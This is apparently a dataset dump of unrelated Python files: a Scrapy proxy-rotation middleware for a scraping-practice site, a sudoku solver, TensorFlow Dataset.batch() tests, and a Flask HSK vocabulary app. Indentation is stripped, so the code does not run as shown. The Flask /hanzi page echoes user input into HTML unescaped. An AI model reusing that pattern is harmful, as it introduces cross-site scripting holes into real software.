spider.logger.info(f'Use proxy => {proxy_ip}')
self.used_proxy_set.add(proxy_ip)
def spider_opened(self, spider):
glidedsky_session = spider.redis_cli.get(self.glided_sky_cookie_set_name)
if not glidedsky_session:
raise ValueError(f'[ {self.glided_sky_cookie_set_name} ] not exists')
self.cookies = {'glidedsky_session': glidedsky_session.decode()}
def process_request(self, request, spider):
request.cookies = self.cookies
if self.glided_sky_enable_proxy and request.meta.get('set_proxy'):
self.set_proxy(request, spider)
def process_response(self, request, response, spider):
"""
判断 cookie 是否失效
因为用到了 response.body (解析response内容)
故此中间件序号需小于590
scrapy 默认配置 ('scrapy.downloadermiddlewares.httpcompression.HttpCompressionMiddleware': 590,)
process_request 顺序执行
process_response 逆序执行
"""
if '/login' in response.url or '/login' in response.xpath('//title/text()').get(''):
spider.crawler.engine.close_spider(spider, 'cookie invalid')
raise IgnoreRequest
return response
def process_exception(self, request, exception, spider):
if self.glided_sky_enable_proxy and request.meta.get('set_proxy') and \
isinstance(exception, self.EXCEPTIONS_TO_RETRY):
# 忽略全部异常,进行重试(题目:IP反爬)
self.set_proxy(request, spider)
request.dont_filter = True
return request
| StarcoderdataPython |
183380 | <filename>SSolver.py
board = [[7,8,0,4,0,0,1,2,0],
[6,0,0,0,7,5,0,0,9],
[0,0,0,6,0,1,0,7,8],
[0,0,7,0,4,0,2,6,0],
[0,0,1,0,5,0,9,3,0],
[9,0,4,0,6,0,0,0,5],
[0,7,0,3,0,0,0,1,2],
[1,2,0,0,0,7,4,0,0],
[0,4,9,2,0,6,0,0,7]]
def solve():
if (checkBoard()):
return True
"Takes a sudoku board in array form as a parameter "
for y in range(0, 9):
for x in range(0, 9):
if (board[y][x] == 0):
for i in range(1, 10):
if (checkValid(x, y, i)):
board[y][x] = i
if (solve()):
return True
else:
board[y][x] = 0
return False
return True
def checkBoard():
for y in range(0, 9):
for x in range(0, 9):
if (board[y][x] == 0):
return False
return True
def checkValid(x, y, val):
"Checking x axis"
for i in range(0, len(board[y])):
if (board[y][i] == val):
return False
"Check y axis"
for i in range(0, len(board)):
if (board[i][x] == val):
return False
"Checking surrounding square"
if (y == 0 or y == 3 or y == 6):
if (csx(x, y+1, val) and csx(x, y+2, val)):
return True
if (y == 1 or y == 4 or y == 7):
if (csx(x, y-1, val) and csx(x, y+1, val)):
return True
else:
if (csx(x, y-1, val) and csx(x, y-2, val)):
return True
return False
def csx(x, y, val):
if (x == 0 or x == 3 or x == 6):
if (board[y][x+1] == val or board[y][x+2] == val):
return False
return True
if (x == 1 or x == 4 or x == 7):
if (board[y][x-1] == val or board[y][x+1] == val):
return False
return True
else:
if (board[y][x-1] == val or board[y][x-2] == val):
return False
return True;
def printBoard():
for i in range(0, len(board)):
print(board[i])
if (solve()):
printBoard()
| StarcoderdataPython |
3343470 | <gh_stars>0
# -*- coding: utf-8 -*-
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for `tf.data.Dataset.batch()`."""
import time
from absl.testing import parameterized
import numpy as np
from tensorflow.python import pywrap_sanitizers
from tensorflow.python.checkpoint import checkpoint as trackable_utils
from tensorflow.python.checkpoint import checkpoint_management
from tensorflow.python.data.experimental.ops import random_access
from tensorflow.python.data.kernel_tests import checkpoint_test_base
from tensorflow.python.data.kernel_tests import test_base
from tensorflow.python.data.ops import dataset_ops
from tensorflow.python.data.ops import options as options_lib
from tensorflow.python.data.util import nest
from tensorflow.python.framework import combinations
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import sparse_tensor
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import script_ops
from tensorflow.python.ops.ragged import ragged_concat_ops
from tensorflow.python.ops.ragged import ragged_factory_ops
from tensorflow.python.ops.ragged import ragged_math_ops
from tensorflow.python.ops.ragged import ragged_tensor
from tensorflow.python.platform import test
class BatchTest(test_base.DatasetTestBase, parameterized.TestCase):
@combinations.generate(
combinations.times(
test_base.default_test_combinations(),
combinations.combine(
count=[0, 28],
batch_size=[14, 15],
drop_remainder=[True, False],
num_parallel_calls=[None, 1, 2, 4])))
def testBasic(self, count, batch_size, drop_remainder, num_parallel_calls):
"""Tests the batch dataset logic for various input configurations.
Args:
count: the number of input elements
batch_size: the batch size
drop_remainder: whether a smaller batch size should be produced if batch
size does not divide number of inputs evenly
num_parallel_calls: the number batches to process asynchronously in
parallel
"""
# The pipeline is TensorSliceDataset -> MapDataset(square_3) ->
# RepeatDataset(count) -> BatchDataset(batch_size).
components = (np.arange(7),
np.array([[1, 2, 3]]) * np.arange(7)[:, np.newaxis],
np.array(37.0) * np.arange(7))
def _map_fn(x, y, z):
return math_ops.square(x), math_ops.square(y), math_ops.square(z)
dataset = dataset_ops.Dataset.from_tensor_slices(components).map(
_map_fn).repeat(count).batch(batch_size, drop_remainder,
num_parallel_calls)
get_next = self.getNext(dataset)
if drop_remainder:
dim0 = batch_size
else:
dim0 = None
self.assertEqual(
[ts.as_list() for ts in nest.flatten(
dataset_ops.get_legacy_output_shapes(dataset))],
[[dim0] + list(c.shape[1:]) for c in components])
num_full_batches = (count * 7) // batch_size
for i in range(num_full_batches):
result = self.evaluate(get_next())
for component, result_component in zip(components, result):
for j in range(batch_size):
self.assertAllEqual(component[(i * batch_size + j) % 7]**2,
result_component[j])
if not drop_remainder and (count * 7) % batch_size > 0:
result = self.evaluate(get_next())
for component, result_component in zip(components, result):
for j in range((count * 7) % batch_size):
self.assertAllEqual(
component[(num_full_batches * batch_size + j) % 7]**2,
result_component[j])
with self.assertRaises(errors.OutOfRangeError):
result = self.evaluate(get_next())
@combinations.generate(test_base.default_test_combinations())
def testInvalidBatchSize(self):
with self.assertRaises(errors.InvalidArgumentError):
dataset = (dataset_ops.Dataset.range(10).batch(0))
self.evaluate(dataset._variant_tensor)
@combinations.generate(test_base.default_test_combinations())
def testDataset(self):
def map_fn(i):
return dataset_ops.Dataset.from_tensors(i)
dataset = dataset_ops.Dataset.range(10).map(map_fn).batch(5)
dataset = dataset.map(lambda x: x)
dataset = dataset.unbatch().flat_map(lambda x: x)
self.assertDatasetProduces(dataset, expected_output=range(10))
def testSparse(self):
def _sparse(i):
return sparse_tensor.SparseTensorValue(
indices=[[0]], values=(i * [1]), dense_shape=[1])
dataset = dataset_ops.Dataset.range(10).map(_sparse).batch(5)
expected_output = [
sparse_tensor.SparseTensorValue(
indices=[[0, 0], [1, 0], [2, 0], [3, 0], [4, 0]],
values=[i * 5, i * 5 + 1, i * 5 + 2, i * 5 + 3, i * 5 + 4],
dense_shape=[5, 1]) for i in range(2)
]
self.assertDatasetProduces(dataset, expected_output=expected_output)
@combinations.generate(test_base.default_test_combinations())
def testSparseWithDifferentDenseShapes(self):
def _sparse(i):
return sparse_tensor.SparseTensorValue(
indices=array_ops.expand_dims(
math_ops.range(i, dtype=dtypes.int64), 1),
values=array_ops.fill([math_ops.cast(i, dtypes.int32)], i),
dense_shape=[i])
dataset = dataset_ops.Dataset.range(10).map(_sparse).batch(5)
expected_output = []
for i in range(2):
expected_indices = []
expected_outputs = []
for j in range(5):
for k in range(i * 5 + j):
expected_indices.append([j, k])
expected_outputs.append(i * 5 + j)
expected_output.append(
sparse_tensor.SparseTensorValue(
indices=expected_indices,
values=expected_outputs,
dense_shape=[5, (i + 1) * 5 - 1]))
self.assertDatasetProduces(dataset, expected_output=expected_output)
@combinations.generate(test_base.default_test_combinations())
def testSparseNested(self):
def _sparse(i):
return sparse_tensor.SparseTensorValue(
indices=[[0]], values=(i * [1]), dense_shape=[1])
dataset = dataset_ops.Dataset.range(10).map(_sparse).batch(5).batch(2)
expected_output = [
sparse_tensor.SparseTensorValue(
indices=[[0, 0, 0], [0, 1, 0], [0, 2, 0], [0, 3, 0], [0, 4, 0],
[1, 0, 0], [1, 1, 0], [1, 2, 0], [1, 3, 0], [1, 4, 0]],
values=[0, 1, 2, 3, 4, 5, 6, 7, 8, 9],
dense_shape=[2, 5, 1])
]
self.assertDatasetProduces(dataset, expected_output=expected_output)
@combinations.generate(test_base.default_test_combinations())
def testShapeError(self):
def generator():
yield [1.0, 2.0, 3.0]
yield [4.0, 5.0, 6.0]
yield [7.0, 8.0, 9.0, 10.0]
dataset = (
dataset_ops.Dataset.from_generator(
generator, dtypes.float32, output_shapes=[None]).batch(3))
self.assertDatasetProduces(
dataset,
expected_error=(
errors.InvalidArgumentError,
r'Cannot batch tensors with different shapes in component 0. First '
r'element had shape \[3\] and element 2 had shape \[4\].'))
@combinations.generate(test_base.default_test_combinations())
def testRagged(self):
def _ragged(i):
return ragged_tensor.RaggedTensor.from_tensor(i * [[1]])
dataset = dataset_ops.Dataset.range(10).map(_ragged).batch(5)
expected_output = [
ragged_factory_ops.constant([[[0]], [[1]], [[2]], [[3]], [[4]]]),
ragged_factory_ops.constant([[[5]], [[6]], [[7]], [[8]], [[9]]])
]
self.assertDatasetProduces(dataset, expected_output=expected_output)
@combinations.generate(test_base.default_test_combinations())
def testRaggedWithDifferentShapes(self):
dataset = dataset_ops.Dataset.range(10).map(ragged_math_ops.range).batch(5)
expected_output = [
ragged_concat_ops.stack([ragged_math_ops.range(i) for i in range(5)]),
ragged_concat_ops.stack(
[ragged_math_ops.range(i) for i in range(5, 10)])
]
self.assertDatasetProduces(dataset, expected_output=expected_output)
@combinations.generate(test_base.default_test_combinations())
def testRaggedNested(self):
def _ragged(i):
return ragged_tensor.RaggedTensor.from_tensor(i * [[1]])
dataset = dataset_ops.Dataset.range(10).map(_ragged).batch(5).batch(2)
expected_output = [
ragged_factory_ops.constant([[[[0]], [[1]], [[2]], [[3]], [[4]]],
[[[5]], [[6]], [[7]], [[8]], [[9]]]])
]
self.assertDatasetProduces(dataset, expected_output=expected_output)
@combinations.generate(test_base.default_test_combinations())
def testNoneComponent(self):
dataset = dataset_ops.Dataset.range(10).map(lambda x: (x, None)).batch(
10).map(lambda x, y: x)
self.assertDatasetProduces(dataset, expected_output=[list(range(10))])
@combinations.generate(
combinations.times(
test_base.default_test_combinations(),
combinations.combine(
local_determinism=[None, True, False],
global_determinism=[True, False])))
def testDeterminismConfiguration(self, local_determinism, global_determinism):
expect_determinism = local_determinism or (local_determinism is None and
global_determinism)
elements = list(range(100))
def dataset_fn(delay_ms):
def sleep(x):
time.sleep(delay_ms / 1000)
return x
def map_function(x):
if math_ops.equal(x, 0):
return script_ops.py_func(sleep, [x], x.dtype)
else:
return x
dataset = dataset_ops.Dataset.from_tensor_slices(elements)
dataset = dataset.map(
map_function, num_parallel_calls=2, deterministic=local_determinism)
dataset = dataset.batch(
batch_size=6, num_parallel_calls=2,
deterministic=local_determinism).unbatch()
opts = options_lib.Options()
opts.deterministic = global_determinism
dataset = dataset.with_options(opts)
return dataset
self.checkDeterminism(dataset_fn, expect_determinism, elements)
@combinations.generate(test_base.eager_only_combinations())
def testCheckpointLargeBatches(self):
if pywrap_sanitizers.is_tsan_enabled():
self.skipTest('Creating a large buffer causes OOM when using tsan.')
# Batches of size 512M
dataset = dataset_ops.Dataset.from_tensors(
array_ops.ones((64, 1024, 1024), dtype=dtypes.float32)).repeat()
dataset = dataset.batch(2, num_parallel_calls=5)
iterator = iter(dataset)
next(iterator) # request an element to fill the buffer
ckpt = trackable_utils.Checkpoint(iterator=iterator)
manager = checkpoint_management.CheckpointManager(
ckpt, self.get_temp_dir(), max_to_keep=1)
manager.save()
@combinations.generate(
combinations.times(test_base.default_test_combinations(),
combinations.combine(num_parallel_calls=[None, 1])))
def testName(self, num_parallel_calls):
dataset = dataset_ops.Dataset.range(5).batch(
5, num_parallel_calls=num_parallel_calls, name='batch')
self.assertDatasetProduces(dataset, [list(range(5))])
class BatchCheckpointTest(checkpoint_test_base.CheckpointTestBase,
parameterized.TestCase):
def build_dataset(self, multiplier=15.0, tensor_slice_len=2, batch_size=2):
components = (np.arange(tensor_slice_len), np.array([[1, 2, 3]]) *
np.arange(tensor_slice_len)[:, np.newaxis],
np.array(multiplier) * np.arange(tensor_slice_len))
return dataset_ops.Dataset.from_tensor_slices(components).batch(batch_size)
@combinations.generate(
combinations.times(test_base.default_test_combinations(),
checkpoint_test_base.default_test_combinations()))
def test(self, verify_fn):
tensor_slice_len = 8
batch_size = 2
num_outputs = tensor_slice_len // batch_size
verify_fn(self,
lambda: self.build_dataset(15.0, tensor_slice_len, batch_size),
num_outputs)
def _sparse(self, i):
return sparse_tensor.SparseTensorValue(
indices=[[0]], values=(i * [1]), dense_shape=[1])
def _build_dataset_sparse(self, batch_size=5):
return dataset_ops.Dataset.range(10).map(self._sparse).batch(batch_size)
@combinations.generate(
combinations.times(test_base.default_test_combinations(),
checkpoint_test_base.default_test_combinations()))
def testSparse(self, verify_fn):
verify_fn(self, self._build_dataset_sparse, num_outputs=2)
def _build_dataset_nested_sparse(self):
return dataset_ops.Dataset.range(10).map(self._sparse).batch(5).batch(2)
@combinations.generate(
combinations.times(test_base.default_test_combinations(),
checkpoint_test_base.default_test_combinations()))
def testNestedSparse(self, verify_fn):
verify_fn(self, self._build_dataset_nested_sparse, num_outputs=1)
class BatchRandomAccessTest(test_base.DatasetTestBase, parameterized.TestCase):
@combinations.generate(
combinations.times(test_base.default_test_combinations(),
combinations.combine(index=[-1, 2, 3, 4])))
def testInvalidIndex(self, index):
dataset = dataset_ops.Dataset.from_tensor_slices([1, 2, 3, 4]).batch(2)
with self.assertRaises(errors.OutOfRangeError):
self.evaluate(random_access.at(dataset, index=index))
@combinations.generate(test_base.default_test_combinations())
def testEmptyDataset(self):
dataset = dataset_ops.Dataset.from_tensor_slices([]).batch(2)
with self.assertRaises(errors.OutOfRangeError):
self.evaluate(random_access.at(dataset, 0))
@combinations.generate(
combinations.times(
test_base.default_test_combinations(),
combinations.combine(
count=[0, 10, 20, 30, 40, 50],
batch_size=[1, 3, 5, 7, 10, 20],
drop_remainder=[True, False])))
def testBasic(self, count, batch_size, drop_remainder):
"""Tests the batch dataset logic for various input configurations.
Args:
count: the number of input elements
batch_size: the batch size
drop_remainder: whether a smaller batch size should be produced if batch
size does not divide number of inputs evenly
"""
dataset = dataset_ops.Dataset.from_tensor_slices(list(range(count))).batch(
batch_size=batch_size, drop_remainder=drop_remainder)
num_full_batches = count // batch_size
for i in range(num_full_batches):
expected_batch = np.arange(
i * batch_size, (i * batch_size + batch_size), 1, dtype=np.int32)
self.assertAllEqual(expected_batch,
self.evaluate(random_access.at(dataset, i)))
has_remainder = (not drop_remainder) and (count % batch_size != 0)
if has_remainder:
expected_batch = np.arange(batch_size * num_full_batches, count, 1)
self.assertAllEqual(
expected_batch,
self.evaluate(random_access.at(dataset, num_full_batches)))
with self.assertRaises(errors.OutOfRangeError):
self.evaluate(
random_access.at(
dataset, index=num_full_batches + (1 if has_remainder else 0)))
@combinations.generate(test_base.default_test_combinations())
def testRandomAccessBatchWithShuffle(self):
dataset = dataset_ops.Dataset.from_tensor_slices([1, 2, 3, 4, 5, 6, 7])
shuffle_dataset = dataset.shuffle(buffer_size=10, seed=2)
batch_dataset = shuffle_dataset.batch(2)
expected_output = [
np.array([5, 2], dtype=np.int32),
np.array([4, 7], dtype=np.int32),
np.array([1, 3], dtype=np.int32),
np.array([6], dtype=np.int32)
]
for i in range(4):
self.assertAllEqual(expected_output[i],
self.evaluate(random_access.at(batch_dataset, i)))
# Checks the order is consistent with shuffle dataset.
for i in range(3):
self.assertAllEqual(
expected_output[i][0],
self.evaluate(random_access.at(shuffle_dataset, i * 2)))
self.assertAllEqual(
expected_output[i][1],
self.evaluate(random_access.at(shuffle_dataset, (i * 2) + 1)))
# Checks the remainder is the last element in shuffled dataset.
self.assertAllEqual(expected_output[3][0],
self.evaluate(random_access.at(shuffle_dataset, 6)))
if __name__ == '__main__':
test.main()
| StarcoderdataPython |
3306891 | from flask import Flask, request
# from flask import Flask, request, url_for
import codecs, unicodedata, urllib
# import math, time, re, os, os.path, random
app = Flask(__name__)
app.secret_key = 's9z9g8bs8b0jis secret key <KEY>'
# try to get the value both from the args and the form
def getform(key, default=u""):
value = request.args.get(key, default)
if value == u"" and key in request.form:
value = request.form[key]
return value
@app.route('/', methods=['GET', 'POST'])
def handle_root():
init_resources()
results = []
results.append("<html>\n<head>")
results.append(u"<title>HSK\u4E1C\u897F Scripts</title>")
results.append("</head>\n<body>")
results.append(u"""<a href="http://hskhsk.com/">HSK\u4E1C\u897F</a>""")
results.append(u"<h1>HSK\u4E1C\u897F Scripts</h1>")
results.append("Tools")
results.append("<ul>")
results.append(u"""<li><a href="/hanzi">Analyse Your \u6C49\u5B57 Vocabulary/Text</a></li>""")
results.append(u"""<li><a href="/hskwords20102012">Where the HSK 2010 words are in 2013</a></li>""")
results.append(u"""<li><a href="/hskchars20102012">Where the HSK 2010 characters are in 2013</a></li>""")
results.append("</ul>")
results.append("New HSK Lists")
results.append("<ul>")
results.append("""<li><a href="/hskwords">HSK Words 2012/2013</a></li>""")
results.append("""<li><a href="/hskchars">HSK Characters 2012/2013</a></li>""")
results.append("""<li><a href="/hskwords2010">HSK Words 2010 (outdated)</a></li>""")
results.append("""<li><a href="/hskchars2010">HSK Characters 2010 (outdated)</a></li>""")
results.append("</ul>")
results.append("</body>\n</html>")
return u"\n".join(results)
@app.route('/hsk', methods=['GET', 'POST'])
def handle_hsk():
return handle_root()
@app.route('/hskwords', methods=['GET', 'POST'])
def handle_hskwords():
return handle_hskwords2012()
@app.route('/hskchars', methods=['GET', 'POST'])
def handle_hskchars():
return handle_hskchars2012()
@app.route('/hskwords2012', methods=['GET', 'POST'])
def handle_hskwords2012():
init_resources()
results = []
results.append("<html>\n<head>")
results.append(u"<title>New HSK 2013 Words</title>")
results.append(u"<style>.definition {color: #000; text-decoration: none; }</style>")
results.append("</head>\n<body>")
results.append(u"""<a href="http://hskhsk.com/word-lists">HSK\u4E1C\u897F</a>""")
results.append(u"""<a href="/">Scripts</a>""")
results.append("""<a href="/hskchars">HSK Characters</a>""")
results.append(u"<h1>New HSK 2013 Words</h1>")
for i in range(1, 7):
results.append(u"<h3>HSK {}</h3>".format(i))
results.append(", ".join(freqorder_word_link(hskwords[i])))
results.append("</body>\n</html>")
return u"\n".join(results)
@app.route('/hskchars2012', methods=['GET', 'POST'])
def handle_hskchars2012():
init_resources()
results = []
results.append("<html>\n<head>")
results.append(u"<title>New HSK 2013 Characters</title>")
results.append(u"<style>.definition {color: #000; text-decoration: none; }</style>")
results.append("</head>\n<body>")
results.append(u"""<a href="http://hskhsk.com/word-lists">HSK\u4E1C\u897F</a>""")
results.append(u"""<a href="/">Scripts</a>""")
results.append("""<a href="/hskwords">HSK Words</a>""")
results.append(u"<h1>HSK 2013 Characters</h1>")
for i in range(1, 7):
results.append(u"<h3>HSK {}</h3>".format(i))
results.append(u", ".join(freqorder_char_link(hskchars[i])))
results.append("</body>\n</html>")
return u"\n".join(results)
@app.route('/hskwords2010', methods=['GET', 'POST'])
def handle_hskwords2010():
init_resources()
results = []
results.append("<html>\n<head>")
results.append(u"<title>New HSK 2010 Words (outdated)</title>")
results.append(u"<style>.definition {color: #000; text-decoration: none; }</style>")
results.append("</head>\n<body>")
results.append(u"""<a href="http://hskhsk.com/word-lists">HSK\u4E1C\u897F</a>""")
results.append(u"""<a href="/">Scripts</a>""")
results.append("""<a href="/hskchars2010">HSK Characters 2010 (outdated)</a>""")
results.append("""<a href="/hskchars">HSK Characters 2012/2013</a>""")
results.append(u"<h1>New HSK 2010 Words (outdated)</h1>")
for i in range(1, 7):
results.append(u"<h3>HSK {}</h3>".format(i))
results.append(", ".join(freqorder_word_link(hskwords2010[i])))
results.append("</body>\n</html>")
return u"\n".join(results)
@app.route('/hskchars2010', methods=['GET', 'POST'])
def handle_hskchars2010():
init_resources()
results = []
results.append("<html>\n<head>")
results.append(u"<title>New HSK 2010 Characters (oudated)</title>")
results.append(u"<style>.definition {color: #000; text-decoration: none; }</style>")
results.append("</head>\n<body>")
results.append(u"""<a href="http://hskhsk.com/word-lists">HSK\u4E1C\u897F</a>""")
results.append(u"""<a href="/">Scripts</a>""")
results.append("""<a href="/hskwords2010">HSK Words 2010 (outdated)</a>""")
results.append("""<a href="/hskwords">HSK Words 2012/2013</a>""")
results.append(u"<h1>New HSK 2010 Characters (outdated)</h1>")
for i in range(1, 7):
results.append(u"<h3>HSK {}</h3>".format(i))
results.append(u", ".join(freqorder_char_link(hskchars2010[i])))
results.append("</body>\n</html>")
return u"\n".join(results)
@app.route('/hskwords20102012', methods=['GET', 'POST'])
def handle_hskwords20102012():
init_resources()
results = []
results.append("<html>\n<head>")
results.append(u"<title>Where the HSK 2010 Words are in 2012/2013</title>")
results.append(u"<style>.definition {color: #000; text-decoration: none; }</style>")
results.append("</head>\n<body>")
results.append(u"""<a href="http://hskhsk.com/word-lists">HSK\u4E1C\u897F</a>""")
results.append(u"""<a href="/">Scripts</a>""")
results.append("""<a href="/hskchars20102012">Where the HSK 2010 Characters are in 2013</a>""")
results.append(u"<h1>Where the HSK 2010 Words are in 2013</h1>")
results.append("""<p>This page shows where the words in the New HSK 2010 ended up when the word lists were revised in 2012 (also valid for 2013).</p>
<table border="1" style="border-collapse:collapse;" cellpadding="2em" cellspacing="0">
<tr><th rowspan=2 colspan=2 style="background-color: #BBBBBB;"></th><th colspan=7>HSK 2012-2013</th></tr>
<tr>
<th><div style="white-space: nowrap;"> HSK 1 </div></th>
<th><div style="white-space: nowrap;"> HSK 2 </div></th>
<th><div style="white-space: nowrap;"> HSK 3 </div></th>
<th><div style="white-space: nowrap;"> HSK 4 </div></th>
<th><div style="white-space: nowrap;"> HSK 5 </div></th>
<th><div style="white-space: nowrap;"> HSK 6 </div></th>
<th><div style="white-space: nowrap;"> Non-HSK </div></th>
</tr>""")
for old in range(1, 8):
results.append("<tr>")
if old == 1:
results.append("""<th rowspan=7>HSK 2010</th>""")
if old == 7:
results.append("""<th><div style="white-space: nowrap;">Non-HSK</div></th>""")
else:
results.append("""<th><div style="white-space: nowrap;">HSK {}</div></th>""".format(old))
for new in range(1, 8):
if old == new:
results.append("""<td style="background-color: #BBBBBB;"></td>""")
else:
if old == 7:
somehanzi = hskwords[new] - hskwords2010[16]
elif new == 7:
somehanzi = hskwords2010[old] - hskwords[16]
else:
somehanzi = hskwords2010[old] & hskwords[new]
results.append("<td>")
results.append(u", ".join(freqorder_word_link(somehanzi)))
results.append("</td>")
results.append("</tr>")
results.append("</table>\n</body>\n</html>")
return u"\n".join(results)
@app.route('/hskchars20102012', methods=['GET', 'POST'])
def handle_hskchars20102012():
init_resources()
results = []
results.append("<html>\n<head>")
results.append(u"<title>Where the HSK 2010 Characters are in 2013</title>")
results.append(u"<style>.definition {color: #000; text-decoration: none; }</style>")
results.append("</head>\n<body>")
results.append(u"""<a href="http://hskhsk.com/word-lists">HSK\u4E1C\u897F</a>""")
results.append(u"""<a href="/">Scripts</a>""")
results.append("""<a href="/hskwords20102012">Where the HSK 2010 Words are in 2013</a>""")
results.append(u"<h1>Where the HSK 2010 Characters are in 2013</h1>")
results.append("""<p>This page shows where the characters in the New HSK 2010 ended up when the word lists were revised in 2012 (also valid for 2013).</p>
<table border="1" style="border-collapse:collapse;" cellpadding="2em" cellspacing="0">
<tr><th rowspan=2 colspan=2 style="background-color: #BBBBBB;"></th><th colspan=7>HSK 2012-2013</th></tr>
<tr>
<th><div style="white-space: nowrap;"> HSK 1 </div></th>
<th><div style="white-space: nowrap;"> HSK 2 </div></th>
<th><div style="white-space: nowrap;"> HSK 3 </div></th>
<th><div style="white-space: nowrap;"> HSK 4 </div></th>
<th><div style="white-space: nowrap;"> HSK 5 </div></th>
<th><div style="white-space: nowrap;"> HSK 6 </div></th>
<th><div style="white-space: nowrap;"> Non-HSK </div></th>
</tr>""")
for old in range(1, 8):
results.append("<tr>")
if old == 1:
results.append("""<th rowspan=7>HSK 2010</th>""")
if old == 7:
results.append("""<th><div style="white-space: nowrap;">Non-HSK</div></th>""")
else:
results.append("""<th><div style="white-space: nowrap;">HSK {}</div></th>""".format(old))
for new in range(1, 8):
if old == new:
results.append("""<td style="background-color: #BBBBBB;"></td>""")
else:
if old == 7:
somehanzi = hskchars[new] - hskchars2010[16]
elif new == 7:
somehanzi = hskchars2010[old] - hskchars[16]
else:
somehanzi = hskchars2010[old] & hskchars[new]
results.append("<td>")
results.append(u", ".join(freqorder_char_link(somehanzi)))
results.append("</td>")
results.append("</tr>")
results.append("</table>\n</body>\n</html>")
return u"\n".join(results)
@app.route('/hanzi', methods=['GET', 'POST'])
def handle_hanzi():
defaultistrue = "true"
if getform("ignoredefaults", ""):
defaultistrue = ""
wordfreqchecked = "checked" if getform("analysevocab", defaultistrue) else ""
hskanalwordschecked = "checked" if getform("analysehskwords", defaultistrue) else ""
hskanalcharschecked = "checked" if getform("analysehskchars") else ""
hskwordschecked = "checked" if getform("suggesthskwords") else ""
hskcharschecked = "checked" if getform("suggesthskchars") else ""
freqwordschecked = "checked" if getform("suggestwords") else ""
freqwordsrechecked = "checked" if getform("suggestwordsreuse") else ""
freqcharschecked = "checked" if getform("suggestchars") else ""
addfreqindexchecked = "checked" if getform("addfreqindex", defaultistrue) else ""
addfreqvaluechecked = "checked" if getform("addfreqvalue") else ""
oneperlinechecked = ""
blockchecked = "checked" if getform("format") == "block" else ""
if blockchecked == "":
oneperlinechecked = "checked"
defaulthanzi = u""
hanzi = getform("hanzi", defaulthanzi)
results = []
results.append("<html>\n<head>")
results.append(u"<title>Analyse Your \u6C49\u5B57 Vocabulary/Text</title>")
results.append("""<style>
.box {
display: inline-block;
}
.title {
text-align:center;
font-weight: bolder;
}
.indent {
clear: both;
padding-left: 1.8em;
text-indent: -1.3em;
}
table tr td {
padding-right: 1em;
}
.compact {
margin-bottom: 0.4em;
margin-top: 0.2em;
}
</style>""")
results.append("</head>")
results.append("<body>")
results.append(u"""<a href="http://hskhsk.com/analyse.html">HSK\u4E1C\u897F</a>""")
results.append(u"""<a href="/">Scripts</a>""")
results.append(u"""<h1 class="compact">Analyse Your \u6C49\u5B57 Vocabulary/Text</h1>
<form method="POST" action="/hanzi">
<input type='hidden' value='true' name='ignoredefaults'>
<table>
<tr><td valign="top">
<h3 class="compact">Actions</h3>
<div class="indent"><input type="checkbox" name="analysevocab" value="true" {}>Analyse words/characters in input</input></div>
<div class="indent"><input type="checkbox" name="analysehskwords" value="true" {}>Analyse HSK words in input</input></div>
<div class="indent"><input type="checkbox" name="analysehskchars" value="true" {}>Analyse HSK characters in input</input></div>
<div class="indent"><input type="checkbox" name="suggesthskwords" value="true" {}>Suggest HSK words not in input</input></div>
<div class="indent"><input type="checkbox" name="suggesthskchars" value="true" {}>Suggest HSK characters not in input</input></div>
<div class="indent"><input type="checkbox" name="suggestwords" value="true" {}>Suggest words not input</input></div>
<div class="indent"><input type="checkbox" name="suggestwordsreuse" value="true" {}>Suggest words using characters in input</input></div>
<div class="indent"><input type="checkbox" name="suggestchars" value="true" {}>Suggest characters not in input</input></div>
</td>
<td valign="top">
<h3 class="compact">Vocabulary/Text Input Options</h3>
<div class="indent"><input type="radio" name="format" value="oneperline" {}>One word/character per line (anything after first whitespace ignored, use this for Skritter word lists)</input></div>
<div class="indent"><input type="radio" name="format" value="block" {}>Big block of text (use this if pasting from a web page etc.)</input></div>
</ul>
<h3 class="compact">Hanzi List Output Options</h3>
<div class="indent"><input type="checkbox" name="addfreqindex" value="true" {}>Add SUBTLEX-CH frequency index (1 for highest frequency word/character, higher values are less frequent)</input></div>
<div class="indent"><input type="checkbox" name="addfreqvalue" value="true" {}>Add SUBTLEX-CH raw word/character frequency (higher values are more frequent)</div>
</td></tr>
</table>
<h3 class="compact">Input your simpflified Chinese vocabulary or text here</h3>
<textarea name="hanzi" cols="80" rows="15">{}</textarea><br />
<input type="submit" value=" Go! " /></form>
""".format(wordfreqchecked, hskanalwordschecked, hskanalcharschecked, hskwordschecked, hskcharschecked, freqwordschecked, freqwordsrechecked, freqcharschecked,
oneperlinechecked, blockchecked,
addfreqindexchecked, addfreqvaluechecked,
hanzi))
if hanzi != defaulthanzi:
performactions(hanzi, results)
results.append("</body>\n</html>")
return u"\n".join(results)
def performactions(hanzi, results):
init_resources()
notes = []
if getform("format") == "block":
words, chars, hskwordcount, hskcharcount = parseblock(hanzi, notes)
else:
words, chars, hskwordcount, hskcharcount = parselist(hanzi, notes)
if len(notes):
results.append("""<span style="color:red;"><h1>Warnings</h1><ul>""")
for note in notes:
results.append(u"<li>{}</li>".format(note))
results.append("</ul></span>")
results.append("<h1>Results</h1>Note that all word/character lists are in descending order of frequency.")
if getform("analysevocab"):
analysewords(results, words, chars, hskwordcount, hskcharcount)
if getform("analysehskwords"):
analysehskwords(results, words, hskwordcount)
if getform("analysehskchars"):
analysehskchars(results, chars, hskcharcount)
if getform("suggesthskwords"):
suggesthskwords(results, words, chars)
if getform("suggesthskchars"):
suggesthskchars(results, words, chars)
if getform("suggestwords"):
suggestfreqwords(results, words, chars)
if getform("suggestwordsreuse"):
suggestfreqwordsre(results, words, chars)
if getform("suggestchars"):
suggestfreqchars(results, words, chars)
def blockboxtemplate():
if getform("addfreqindex") and getform("addfreqvalue"):
cols="cols=\"25\""
else:
cols="cols=\"15\""
return u"""<div class="box"><div class="title">{}</div><div><textarea name="{}" """ + cols + """ rows="12">{}</textarea></div></div>"""
